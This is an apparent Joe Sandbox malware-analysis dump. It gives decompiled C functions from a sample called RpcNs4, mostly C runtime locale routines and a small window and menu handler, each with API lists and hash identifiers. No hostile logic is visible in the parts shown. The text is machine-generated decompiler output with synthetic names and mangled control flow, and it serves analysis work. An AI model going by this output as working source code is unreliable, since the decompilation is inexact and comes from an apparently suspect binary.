                                                                                                      					_t42 = E0040CFF1(8, 1);
                                                                                                      					if(_t42 != 0) {
                                                                                                      						_t12 = E0040CFF1(0xb8, 1);
                                                                                                      						 *_t42 = _t12;
                                                                                                      						__eflags = _t12;
                                                                                                      						if(_t12 != 0) {
                                                                                                      							_t13 = E0040CFF1(0x220, 1);
                                                                                                      							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                                                                      							__eflags = _t13;
                                                                                                      							if(_t13 != 0) {
                                                                                                      								E00413694( *_t42, 0x4359f8);
                                                                                                      								_t15 = E00413F7F(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                                                                                      								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                      								__eflags = _t15;
                                                                                                      								if(__eflags == 0) {
                                                                                                      									L14:
                                                                                                      									E00402CB3();
                                                                                                      									E0040E7B6( *_t42);
                                                                                                      									E0040E65C( *_t42);
                                                                                                      									E00402CB3(_t42);
                                                                                                      									_t42 = 0;
                                                                                                      									L16:
                                                                                                      									return _t42;
                                                                                                      								}
                                                                                                      								_push( *((intOrPtr*)( *_t42 + 4)));
                                                                                                      								_t22 = E0040DF62(__edx, 1, __eflags);
                                                                                                      								__eflags = _t22;
                                                                                                      								if(_t22 == 0) {
                                                                                                      									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                                                                      									goto L16;
                                                                                                      								}
                                                                                                      								_push( *((intOrPtr*)(_t42 + 4)));
                                                                                                      								goto L14;
                                                                                                      							}
                                                                                                      							E00402CB3( *_t42);
                                                                                                      							E00402CB3(_t42);
                                                                                                      							L8:
                                                                                                      							goto L3;
                                                                                                      						}
                                                                                                      						E00402CB3(_t42);
                                                                                                      						goto L8;
                                                                                                      					}
                                                                                                      					L3:
                                                                                                      					 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      					goto L4;
                                                                                                      				}
                                                                                                      			}











                                                                                                      0x00413b88
                                                                                                      0x00413bae
                                                                                                      0x00000000
                                                                                                      0x00413b90
                                                                                                      0x00413b9b
                                                                                                      0x00413ba1
                                                                                                      0x00413bba
                                                                                                      0x00413bbf
                                                                                                      0x00413bc3
                                                                                                      0x00413bc5
                                                                                                      0x00413bd6
                                                                                                      0x00413bdb
                                                                                                      0x00413be0
                                                                                                      0x00413be2
                                                                                                      0x00413bfb
                                                                                                      0x00413c08
                                                                                                      0x00413c10
                                                                                                      0x00413c13
                                                                                                      0x00413c15
                                                                                                      0x00413c2a
                                                                                                      0x00413c2a
                                                                                                      0x00413c31
                                                                                                      0x00413c38
                                                                                                      0x00413c3e
                                                                                                      0x00413c46
                                                                                                      0x00413c4f
                                                                                                      0x00000000
                                                                                                      0x00413c4f
                                                                                                      0x00413c19
                                                                                                      0x00413c1c
                                                                                                      0x00413c23
                                                                                                      0x00413c25
                                                                                                      0x00413c4d
                                                                                                      0x00000000
                                                                                                      0x00413c4d
                                                                                                      0x00413c27
                                                                                                      0x00000000
                                                                                                      0x00413c27
                                                                                                      0x00413be6
                                                                                                      0x00413bec
                                                                                                      0x00413bcd
                                                                                                      0x00000000
                                                                                                      0x00413bcd
                                                                                                      0x00413bc8
                                                                                                      0x00000000
                                                                                                      0x00413bc8
                                                                                                      0x00413ba3
                                                                                                      0x00413ba8
                                                                                                      0x00000000
                                                                                                      0x00413ba8

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1503006713-0
                                                                                                      • Opcode ID: 24c83f02682986b5a658c73e614b9f1ff3bed2990c2cbe72f34b9a537931d441
                                                                                                      • Instruction ID: ae6e16b3023edc39ad57d468ef94e2b8fd466f6482efcdffcca20402270c21c8
                                                                                                      • Opcode Fuzzy Hash: 24c83f02682986b5a658c73e614b9f1ff3bed2990c2cbe72f34b9a537931d441
                                                                                                      • Instruction Fuzzy Hash: 17212532108A01EAE7323F26DD06A8A7BA4DF40716F10403FF448761D2EA3D9A50965D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 84%
                                                                                                      			E00413C56(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                                                                                      				signed int _v8;
                                                                                                      				signed int _v32;
                                                                                                      				intOrPtr _v36;
                                                                                                      				signed int _v40;
                                                                                                      				void* _t38;
                                                                                                      				signed int _t45;
                                                                                                      				signed int _t60;
                                                                                                      				intOrPtr _t77;
                                                                                                      				void* _t80;
                                                                                                      				intOrPtr* _t82;
                                                                                                      				signed int _t83;
                                                                                                      				signed int _t86;
                                                                                                      				intOrPtr _t88;
                                                                                                      				void* _t92;
                                                                                                      
                                                                                                      				_t80 = __edx;
                                                                                                      				_push(__ebx);
                                                                                                      				_push(__esi);
                                                                                                      				_t86 = 0;
                                                                                                      				if(_a12 <= 0) {
                                                                                                      					L5:
                                                                                                      					return _t38;
                                                                                                      				} else {
                                                                                                      					_push(__edi);
                                                                                                      					_t82 =  &_a12;
                                                                                                      					while(1) {
                                                                                                      						_t82 = _t82 + 4;
                                                                                                      						_t38 = E0040E224(_a4, _a8,  *_t82);
                                                                                                      						_t92 = _t92 + 0xc;
                                                                                                      						if(_t38 != 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						_t86 = _t86 + 1;
                                                                                                      						if(_t86 < _a12) {
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							goto L5;
                                                                                                      						}
                                                                                                      						goto L20;
                                                                                                      					}
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					_push(0);
                                                                                                      					E00406C1E(0, _t80);
                                                                                                      					asm("int3");
                                                                                                      					_push(0x14);
                                                                                                      					_push(0x434758);
                                                                                                      					E00406830(0, _t82, _t86);
                                                                                                      					_t66 = 0;
                                                                                                      					_v32 = 0;
                                                                                                      					__eflags = _a4 - 5;
                                                                                                      					if(_a4 <= 5) {
                                                                                                      						_t88 = E00404224();
                                                                                                      						_v36 = _t88;
                                                                                                      						E0040E856(0, _t80, _t82, _t88, __eflags);
                                                                                                      						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                                                                      						_v8 = _v8 & 0;
                                                                                                      						_t83 = E0040CFF1(0xb8, 1);
                                                                                                      						_v40 = _t83;
                                                                                                      						__eflags = _t83;
                                                                                                      						if(_t83 != 0) {
                                                                                                      							E00406D5B(0xc);
                                                                                                      							_v8 = 1;
                                                                                                      							E00413694(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                      							E00413DCB();
                                                                                                      							_t66 = E00413F7F(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                                                                                      							_v32 = _t66;
                                                                                                      							__eflags = _t66;
                                                                                                      							if(_t66 == 0) {
                                                                                                      								E0040E7B6(_t83);
                                                                                                      								_t43 = E0040E65C(_t83);
                                                                                                      							} else {
                                                                                                      								__eflags = _a8;
                                                                                                      								if(_a8 != 0) {
                                                                                                      									_t60 = E00418AEC(_a8, 0x43588c);
                                                                                                      									__eflags = _t60;
                                                                                                      									if(_t60 != 0) {
                                                                                                      										 *0x4377a8 = 1;
                                                                                                      									}
                                                                                                      								}
                                                                                                      								E00406D5B(0xc);
                                                                                                      								_v8 = 2;
                                                                                                      								_t25 = _t88 + 0x6c; // 0x6c
                                                                                                      								E0040E8D6(_t25, _t83);
                                                                                                      								E0040E7B6(_t83);
                                                                                                      								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                                                                      								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                                                                      									__eflags =  *0x435d60 & 0x00000001;
                                                                                                      									if(( *0x435d60 & 0x00000001) == 0) {
                                                                                                      										E0040E8D6(0x4359f4,  *((intOrPtr*)(_t88 + 0x6c)));
                                                                                                      										_t77 =  *0x4359f4; // 0x4359f8
                                                                                                      										_t32 = _t77 + 0x84; // 0x435d70
                                                                                                      										 *0x435d68 =  *_t32;
                                                                                                      										_t33 = _t77 + 0x90; // 0x430d60
                                                                                                      										 *0x435dc4 =  *_t33;
                                                                                                      										_t34 = _t77 + 0x74; // 0x1
                                                                                                      										 *0x435888 =  *_t34;
                                                                                                      									}
                                                                                                      								}
                                                                                                      								_v8 = _v8 & 0x00000000;
                                                                                                      								_t43 = E00413DDA();
                                                                                                      							}
                                                                                                      						}
                                                                                                      						_v8 = 0xfffffffe;
                                                                                                      						E00413E0D(_t43, _t88);
                                                                                                      						_t45 = _t66;
                                                                                                      					} else {
                                                                                                      						 *((intOrPtr*)(E00403FAC())) = 0x16;
                                                                                                      						E00406BF3();
                                                                                                      						_t45 = 0;
                                                                                                      					}
                                                                                                      					return E00406875(_t45);
                                                                                                      				}
                                                                                                      				L20:
                                                                                                      			}

















                                                                                                      0x00413c56
                                                                                                      0x00413c59
                                                                                                      0x00413c5c
                                                                                                      0x00413c5d
                                                                                                      0x00413c62
                                                                                                      0x00413c86
                                                                                                      0x00413c89
                                                                                                      0x00413c64
                                                                                                      0x00413c64
                                                                                                      0x00413c65
                                                                                                      0x00413c68
                                                                                                      0x00413c68
                                                                                                      0x00413c73
                                                                                                      0x00413c78
                                                                                                      0x00413c7d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00413c7f
                                                                                                      0x00413c83
                                                                                                      0x00000000
                                                                                                      0x00413c85
                                                                                                      0x00000000
                                                                                                      0x00413c85
                                                                                                      0x00000000
                                                                                                      0x00413c83
                                                                                                      0x00413c8a
                                                                                                      0x00413c8b
                                                                                                      0x00413c8c
                                                                                                      0x00413c8d
                                                                                                      0x00413c8e
                                                                                                      0x00413c8f
                                                                                                      0x00413c94
                                                                                                      0x00413c95
                                                                                                      0x00413c97
                                                                                                      0x00413c9c
                                                                                                      0x00413ca1
                                                                                                      0x00413ca3
                                                                                                      0x00413ca6
                                                                                                      0x00413caa
                                                                                                      0x00413cc8
                                                                                                      0x00413cca
                                                                                                      0x00413ccd
                                                                                                      0x00413cd2
                                                                                                      0x00413cd6
                                                                                                      0x00413ce7
                                                                                                      0x00413ce9
                                                                                                      0x00413cec
                                                                                                      0x00413cee
                                                                                                      0x00413cf6
                                                                                                      0x00413cfc
                                                                                                      0x00413d07
                                                                                                      0x00413d0e
                                                                                                      0x00413d12
                                                                                                      0x00413d26
                                                                                                      0x00413d28
                                                                                                      0x00413d2b
                                                                                                      0x00413d2d
                                                                                                      0x00413de6
                                                                                                      0x00413dec
                                                                                                      0x00413d33
                                                                                                      0x00413d33
                                                                                                      0x00413d37
                                                                                                      0x00413d41
                                                                                                      0x00413d48
                                                                                                      0x00413d4a
                                                                                                      0x00413d4c
                                                                                                      0x00413d4c
                                                                                                      0x00413d4a
                                                                                                      0x00413d58
                                                                                                      0x00413d5e
                                                                                                      0x00413d65
                                                                                                      0x00413d6a
                                                                                                      0x00413d70
                                                                                                      0x00413d78
                                                                                                      0x00413d7c
                                                                                                      0x00413d7e
                                                                                                      0x00413d85
                                                                                                      0x00413d8f
                                                                                                      0x00413d96
                                                                                                      0x00413d9c
                                                                                                      0x00413da2
                                                                                                      0x00413da7
                                                                                                      0x00413dad
                                                                                                      0x00413db2
                                                                                                      0x00413db5
                                                                                                      0x00413db5
                                                                                                      0x00413d85
                                                                                                      0x00413dba
                                                                                                      0x00413dbe
                                                                                                      0x00413dbe
                                                                                                      0x00413d2d
                                                                                                      0x00413df3
                                                                                                      0x00413dfa
                                                                                                      0x00413dff
                                                                                                      0x00413cac
                                                                                                      0x00413cb1
                                                                                                      0x00413cb7
                                                                                                      0x00413cbc
                                                                                                      0x00413cbc
                                                                                                      0x00413e06
                                                                                                      0x00413e06
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                      • String ID: p]C
                                                                                                      • API String ID: 790675137-1265664625
                                                                                                      • Opcode ID: 6d1495893d940ef6be95611885f58a632d76adb249db02c33a89ec36003c17cf
                                                                                                      • Instruction ID: 623bc6a35c898f006257f3d2ac9b328070ff02d3e3c726b5a2c0b95e6af6f13e
                                                                                                      • Opcode Fuzzy Hash: 6d1495893d940ef6be95611885f58a632d76adb249db02c33a89ec36003c17cf
                                                                                                      • Instruction Fuzzy Hash: D8410072904304AFDB10AFA6A8827DE77E0AF04319F10443FF905AA292DB7D96919B5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401100(long __ecx, struct HWND__* _a4, struct HINSTANCE__* _a8, CHAR* _a12) {
                                                                                                      				struct HWND__* _t16;
                                                                                                      				struct HMENU__* _t18;
                                                                                                      				void* _t23;
                                                                                                      				long _t28;
                                                                                                      				struct HINSTANCE__* _t30;
                                                                                                      				struct HDC__* _t31;
                                                                                                      
                                                                                                      				_t16 = _a4;
                                                                                                      				_t30 = _a8;
                                                                                                      				_t28 = __ecx;
                                                                                                      				 *((intOrPtr*)(__ecx)) = 0x42cc54;
                                                                                                      				 *((char*)(__ecx + 0x1c)) = 0;
                                                                                                      				 *(__ecx + 0x14) = _t16;
                                                                                                      				 *(_t28 + 0x18) = CreateWindowExA(0, _a12, 0, 0x90000000, 0, 0, 0x6f, 0x15, _t16, 0, _t30, 0);
                                                                                                      				_t18 = LoadMenuA(_t30, 0x6d);
                                                                                                      				 *(_t28 + 8) = _t18;
                                                                                                      				 *((intOrPtr*)(_t28 + 0xc)) = GetSubMenu(_t18, 0);
                                                                                                      				_t31 = GetDC( *(_t28 + 0x18));
                                                                                                      				 *(_t28 + 0x10) = CreateCompatibleDC(_t31);
                                                                                                      				ReleaseDC( *(_t28 + 0x18), _t31);
                                                                                                      				_t23 = LoadBitmapA(_t30, 0x85);
                                                                                                      				 *(_t28 + 4) = _t23;
                                                                                                      				SelectObject( *(_t28 + 0x10), _t23);
                                                                                                      				SetWindowLongA( *(_t28 + 0x18), 0xfffffffc, 0x401050);
                                                                                                      				SetWindowLongA( *(_t28 + 0x18), 0xffffffeb, _t28);
                                                                                                      				return _t28;
                                                                                                      			}









                                                                                                      0x00401103
                                                                                                      0x00401109
                                                                                                      0x0040110c
                                                                                                      0x00401126
                                                                                                      0x0040112e
                                                                                                      0x00401132
                                                                                                      0x0040113e
                                                                                                      0x00401141
                                                                                                      0x0040114a
                                                                                                      0x00401156
                                                                                                      0x0040115f
                                                                                                      0x0040116c
                                                                                                      0x0040116f
                                                                                                      0x0040117b
                                                                                                      0x00401185
                                                                                                      0x00401188
                                                                                                      0x0040119e
                                                                                                      0x004011a6
                                                                                                      0x004011ae

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateLoadLongMenu$BitmapCompatibleObjectReleaseSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 3316247204-0
                                                                                                      • Opcode ID: f11f789d58ba93abe2704281de4c3fe989fbbccd220e4df097f1c4c5a90b91e0
                                                                                                      • Instruction ID: 47f8015d6f8a27a6f2185c8b06d3858f74a4fe0b09e34247c124d55f7d547d32
                                                                                                      • Opcode Fuzzy Hash: f11f789d58ba93abe2704281de4c3fe989fbbccd220e4df097f1c4c5a90b91e0
                                                                                                      • Instruction Fuzzy Hash: AF111C71640310BFEB145F659C89F5B7F68EB49711F1045A5FA00AA2E5C6B5DC20CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E00401C80(void* __ebx, void* __edx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagPAINTSTRUCT _v72;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t19;
                                                                                                      				void* _t22;
                                                                                                      				void* _t25;
                                                                                                      				void* _t34;
                                                                                                      				void* _t38;
                                                                                                      				signed int _t42;
                                                                                                      				int _t53;
                                                                                                      				int _t58;
                                                                                                      				intOrPtr _t63;
                                                                                                      				struct HWND__* _t72;
                                                                                                      				signed int _t73;
                                                                                                      
                                                                                                      				_t70 = __edx;
                                                                                                      				_t19 =  *0x435040; // 0x4b97bcea
                                                                                                      				_v8 = _t19 ^ _t73;
                                                                                                      				_t53 = _a8;
                                                                                                      				_t72 = _a4;
                                                                                                      				_t22 = _t53 - 2;
                                                                                                      				if(_t22 == 0) {
                                                                                                      					PostQuitMessage(0);
                                                                                                      					return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      				} else {
                                                                                                      					_t25 = _t22 - 0xd;
                                                                                                      					if(_t25 == 0) {
                                                                                                      						BeginPaint(_t72,  &_v72);
                                                                                                      						EndPaint(_t72,  &_v72);
                                                                                                      						return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      					} else {
                                                                                                      						if(_t25 == 0x102) {
                                                                                                      							_t58 = _a12;
                                                                                                      							_t34 = (_t58 & 0x0000ffff) - 0x69;
                                                                                                      							if(_t34 == 0) {
                                                                                                      								DestroyWindow(_t72);
                                                                                                      								return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      							} else {
                                                                                                      								_t38 = _t34 - 0x7f9d;
                                                                                                      								if(_t38 == 0) {
                                                                                                      									MessageBoxA(_t72, 0x436918, "About", 0x40);
                                                                                                      									return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      								} else {
                                                                                                      									_t42 = _t38 - 1;
                                                                                                      									if(_t42 == 0) {
                                                                                                      										_t63 =  *0x436844; // 0x0
                                                                                                      										 *0x4368ac = _t42 & 0xffffff00 |  *0x4368ac == 0x00000000;
                                                                                                      										L0040104B(_t63, (_t42 & 0xffffff00 |  *0x4368ac == 0x00000000) & 0x000000ff);
                                                                                                      										return E004023FF(__ebx, _v8 ^ _t73, __edx, __edi, _t72);
                                                                                                      									} else {
                                                                                                      										DefWindowProcA(_t72, 0x111, _t58, _a16);
                                                                                                      										return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						} else {
                                                                                                      							DefWindowProcA(_t72, _t53, _a12, _a16);
                                                                                                      							return E004023FF(__ebx, _v8 ^ _t73, _t70, __edi, _t72);
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}

















                                                                                                      0x00401c80
                                                                                                      0x00401c86
                                                                                                      0x00401c8d
                                                                                                      0x00401c90
                                                                                                      0x00401c96
                                                                                                      0x00401c99
                                                                                                      0x00401c9c
                                                                                                      0x00401da7
                                                                                                      0x00401dbd
                                                                                                      0x00401ca2
                                                                                                      0x00401ca2
                                                                                                      0x00401ca5
                                                                                                      0x00401d81
                                                                                                      0x00401d8c
                                                                                                      0x00401da2
                                                                                                      0x00401cab
                                                                                                      0x00401cb0
                                                                                                      0x00401cd1
                                                                                                      0x00401cd7
                                                                                                      0x00401cda
                                                                                                      0x00401d63
                                                                                                      0x00401d79
                                                                                                      0x00401ce0
                                                                                                      0x00401ce0
                                                                                                      0x00401ce5
                                                                                                      0x00401d49
                                                                                                      0x00401d5f
                                                                                                      0x00401ce7
                                                                                                      0x00401ce7
                                                                                                      0x00401ce8
                                                                                                      0x00401d12
                                                                                                      0x00401d1b
                                                                                                      0x00401d24
                                                                                                      0x00401d39
                                                                                                      0x00401cea
                                                                                                      0x00401cf4
                                                                                                      0x00401d08
                                                                                                      0x00401d08
                                                                                                      0x00401ce8
                                                                                                      0x00401ce5
                                                                                                      0x00401cb2
                                                                                                      0x00401cba
                                                                                                      0x00401cce
                                                                                                      0x00401cce
                                                                                                      0x00401cb0
                                                                                                      0x00401ca5

                                                                                                      APIs
                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401CBA
                                                                                                      • DefWindowProcA.USER32(?,00000111,?,?), ref: 00401CF4
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401D81
                                                                                                      • EndPaint.USER32(?,?), ref: 00401D8C
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401DA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                      • String ID: About
                                                                                                      • API String ID: 3181456275-1949634023
                                                                                                      • Opcode ID: 5a5cfd39e6820e542c64a1b125ed650101f42d542ecb90d47b2c7f2a410015d5
                                                                                                      • Instruction ID: 88c6f8a955abea856bd48f6bc5af4ea1602800acc5508de23de6365d246a8e04
                                                                                                      • Opcode Fuzzy Hash: 5a5cfd39e6820e542c64a1b125ed650101f42d542ecb90d47b2c7f2a410015d5
                                                                                                      • Instruction Fuzzy Hash: BB31B63161000D6BDB14EF79AD0AABF77A9EF09300F00456BFC02A65D2CAB95E10A799
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 84%
                                                                                                      			E00413496(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				void* _t10;
                                                                                                      				signed int _t12;
                                                                                                      				intOrPtr* _t16;
                                                                                                      				intOrPtr* _t31;
                                                                                                      				void* _t32;
                                                                                                      
                                                                                                      				_push(8);
                                                                                                      				_push(0x434730);
                                                                                                      				_t10 = E00406830(__ebx, __edi, __esi);
                                                                                                      				_t31 =  *((intOrPtr*)(_t32 + 8));
                                                                                                      				if(_t31 != 0) {
                                                                                                      					_t12 = E00406D5B(0xd);
                                                                                                      					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                                                                      					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                                                                                      						asm("lock xadd [ecx], eax");
                                                                                                      						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x435570) {
                                                                                                      							E00402CB3( *((intOrPtr*)(_t31 + 4)));
                                                                                                      						}
                                                                                                      					}
                                                                                                      					 *(_t32 - 4) = 0xfffffffe;
                                                                                                      					E00413ABB();
                                                                                                      					if( *_t31 != 0) {
                                                                                                      						E00406D5B(0xc);
                                                                                                      						 *(_t32 - 4) = 1;
                                                                                                      						E0040E7B6( *_t31);
                                                                                                      						_t16 =  *_t31;
                                                                                                      						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x4359f8) {
                                                                                                      							E0040E65C(_t16);
                                                                                                      						}
                                                                                                      						 *(_t32 - 4) = 0xfffffffe;
                                                                                                      						E00413AC7();
                                                                                                      					}
                                                                                                      					_t10 = E00402CB3(_t31);
                                                                                                      				}
                                                                                                      				return E00406875(_t10);
                                                                                                      			}








                                                                                                      0x00413a19
                                                                                                      0x00413a1b
                                                                                                      0x00413a20
                                                                                                      0x00413a25
                                                                                                      0x00413a2a
                                                                                                      0x00413a32
                                                                                                      0x00413a38
                                                                                                      0x00413a41
                                                                                                      0x00413a46
                                                                                                      0x00413a4a
                                                                                                      0x00413a58
                                                                                                      0x00413a5d
                                                                                                      0x00413a4a
                                                                                                      0x00413a5e
                                                                                                      0x00413a65
                                                                                                      0x00413a6d
                                                                                                      0x00413a71
                                                                                                      0x00413a77
                                                                                                      0x00413a80
                                                                                                      0x00413a86
                                                                                                      0x00413a8a
                                                                                                      0x00413a99
                                                                                                      0x00413a9e
                                                                                                      0x00413a9f
                                                                                                      0x00413aa6
                                                                                                      0x00413aa6
                                                                                                      0x00413aac
                                                                                                      0x00413ab1
                                                                                                      0x00413ab7

                                                                                                      APIs
                                                                                                      • __lock.LIBCMT ref: 00413A32
                                                                                                        • Part of subcall function 00406D5B: __mtinitlocknum.LIBCMT ref: 00406D6D
                                                                                                        • Part of subcall function 00406D5B: __amsg_exit.LIBCMT ref: 00406D79
                                                                                                        • Part of subcall function 00406D5B: EnterCriticalSection.KERNEL32(00000000,?,004042F4,0000000D), ref: 00406D86
                                                                                                      • _free.LIBCMT ref: 00413A58
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      • __lock.LIBCMT ref: 00413A71
                                                                                                      • ___removelocaleref.LIBCMT ref: 00413A80
                                                                                                      • ___freetlocinfo.LIBCMT ref: 00413A99
                                                                                                      • _free.LIBCMT ref: 00413AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                      • String ID: pUC
                                                                                                      • API String ID: 626533743-2208893049
                                                                                                      • Opcode ID: c2db22ab7447c57abcc7cacf5659124182d64d1af5b66121e739107cc329366f
                                                                                                      • Instruction ID: c3db13d6e87042e8d3d9c327ba538853f5f3e6b802cb2b63995fb45b47053acf
                                                                                                      • Opcode Fuzzy Hash: c2db22ab7447c57abcc7cacf5659124182d64d1af5b66121e739107cc329366f
                                                                                                      • Instruction Fuzzy Hash: AB01A131501700AADB34AF669506B9E73A05F0076AF20866FE4E9762D1CB7D9AC1C68D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 71%
                                                                                                      			E004030AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr _t21;
                                                                                                      				intOrPtr _t27;
                                                                                                      				intOrPtr _t28;
                                                                                                      				intOrPtr _t36;
                                                                                                      				intOrPtr _t44;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr* _t47;
                                                                                                      				intOrPtr _t49;
                                                                                                      				void* _t51;
                                                                                                      				void* _t53;
                                                                                                      
                                                                                                      				_t45 = __edx;
